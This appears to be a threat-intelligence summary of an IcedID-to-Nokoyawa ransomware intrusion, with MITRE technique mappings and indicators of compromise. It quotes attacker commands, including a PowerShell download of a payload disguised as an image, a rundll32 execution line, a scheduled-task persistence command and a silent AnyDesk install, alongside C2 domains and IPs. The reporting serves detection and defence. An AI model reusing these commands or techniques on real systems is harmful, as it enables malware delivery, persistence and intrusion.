From OneNote to RansomNote: An Ice Cold Intrusion

Threat actors gained initial access via malicious Microsoft OneNote attachments that executed a batch file to download an IcedID DLL (disguised as an image) which ran via rundll32 and established long-lived C2 beaconing before deploying Cobalt Strike, AnyDesk, exfiltrating data with FileZilla, and ultimately encrypting two servers with Nokoyawa. Key infrastructure observed includes IcedID and Cobalt Strike C2 domains and an SFTP exfil host. #IcedID #Nokoyawa

Keypoints

Initial access via phishing emails carrying a OneNote file that hid and executed a batch file (O p e n.cmd) to run PowerShell and download an IcedID DLL disguised as an image.
IcedID executed via rundll32, created persistence with a scheduled task, and beaconed to multiple C2 domains (including aerilaponawki[.]com) for over 30 days before further activity.
On day 33 the IcedID implant dropped Cobalt Strike beacons (DLL/EXE) which used default named pipes and performed process injection and Active Directory discovery with AdFind.
Threat actors installed AnyDesk (silent/service install) for interactive access, used RDP for lateral movement, and deployed Cobalt Strike and installers via Internet Explorer downloads.
FileZilla was used to exfiltrate data over SFTP to 45.155.204.5 before deploying Nokoyawa ransomware to a file server and a backup server, using Unlocker/ProcessHacker to bypass file locks.
Detections observed: ET MALWARE Win32/IcedID Request Cookie, Cobalt Strike malleable profile hits, Sysmon events for named pipe creation and LSASS access, and artifacts from AnyDesk/FileZilla installations.

MITRE Techniques

[T1566] Phishing – Initial access via emails with malicious OneNote attachments that “distributed emails containing malicious OneNote attachments.”
[T1204.002] Malicious File – OneNote triggered execution of a batch file which ran PowerShell to download the IcedID DLL: ‘powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:programdataCOIm.jpg’.
[T1218.011] Rundll32 – IcedID DLL executed using rundll32: ‘rundll32 c:programdataCOIm.jpg,init’.
[T1053.005] Scheduled Task – Persistence achieved via a scheduled task executing the IcedID DLL at logon: ‘rundll32.exe “C:Users[REDACTED]AppDataRoaming[REDACTED]Cadiak.dll”,init –od=”DeskBlouselicense.dat”‘.
[T1036.008] Masquerade File Type – Malware DLL was named with an image extension to evade detection (e.g., ‘COIm.jpg’ actually a DLL).
[T1105] Ingress Tool Transfer – Cobalt Strike beacons and other tooling were downloaded onto hosts via Internet Explorer (e.g., ‘91.215.85[.]183/download/csrss.exe’).
[T1055] Process Injection – Cobalt Strike performed process injection into svchost.exe and created anomalous parent/child relationships with cmd.exe.
[T1003.001] LSASS Memory – Credential access achieved by accessing and creating a remote thread in lsass.exe from rundll32.exe: ‘Process accessed: SourceImage: …rundll32.exe TargetImage: …lsass.exe’.
[T1021.001] Remote Services (RDP) – Lateral movement using RDP from the beachhead to backup and file servers.
[T1219] Remote Access Software – AnyDesk installed silently as a service for interactive remote control: ‘AnyDesk.exe –install C:ProgramDataAny –start-with-win –silent’.
[T1048] Exfiltration Over Alternative Protocol – Data exfiltration performed via FileZilla SFTP to 45.155.204.5.
[T1486] Data Encrypted for Impact – Final impact by deploying Nokoyawa ransomware with a config for encryption and deletion of shadows: ‘DELETE_SHADOW: true’.

Indicators of Compromise

[Domain] IcedID/C2 and payload hosting – aerilaponawki[.]com, mrassociattes[.]com (download URL for IcedID payload).
[Domain] Cobalt Strike C2 – msc-mvc-updates[.]com (91.215.85.183) used to host Cobalt Strike beacons.
[IP] Exfiltration server – 45.155.204.5 (SSH/FileZilla SFTP destination, observed SSH hash c561c2cd…), and C2 IP 193.149.129.131 (aerilaponawki[.]com).
[File name] Delivered/malicious files – COIm.jpg (IcedID DLL disguised as JPG), O p e n.cmd (OneNote-launched batch file), and INSTALL.ps1 (AnyDesk installer script).
[Hashes] Example file hashes – COIm.jpg: d1da347e78bf043e2dc61638e946c3da, agaloz.dll: 76a1f94ed6499b99d2cc500998846875, and 5 more hashes.

The attack flow began with a OneNote attachment that hid a batch file; when opened the batch executed PowerShell to download a DLL named as an image (COIm.jpg) and executed it via rundll32, which immediately beaconed to IcedID C2 domains (e.g., aerilaponawki[.]com) and dropped IcedID components (Cadiak.dll and license.dat). IcedID created persistence with a scheduled task and maintained stealthy beaconing for over three weeks before receiving commands to download additional tooling.

On day 33 the IcedID implant delivered Cobalt Strike beacons (DLL and EXE variants) executed via regsvr32 and direct launches; these beacons created default named pipes (e.g., postex_*) and performed process injection into svchost.exe, AD enumeration with AdFind, and hands-on reconnaissance via AnyDesk after the actor installed AnyDesk silently (AnyDesk.exe –install … –start-with-win –silent). The operators used RDP for lateral movement, downloaded Cobalt Strike payloads through Internet Explorer (91.215.85[.]183/download/csrss.exe), and executed INSTALL.ps1 to persist AnyDesk across hosts.

After interactive access they used SoftPerfect NetScan and nslookup scripts to map hosts and ports, browsed file shares for sensitive documents, then installed FileZilla on a file server to exfiltrate data to 45.155.204.5 via SFTP. Following exfiltration they deployed Nokoyawa ransomware to the file and backup servers (dropping svchost.exe and a .bat automation script with a base64 config specifying NOTE_NAME and DELETE_SHADOW:true), used Unlocker/ProcessHacker to address file locks, uninstalled FileZilla to remove traces, and executed the ransomware to encrypt the two servers.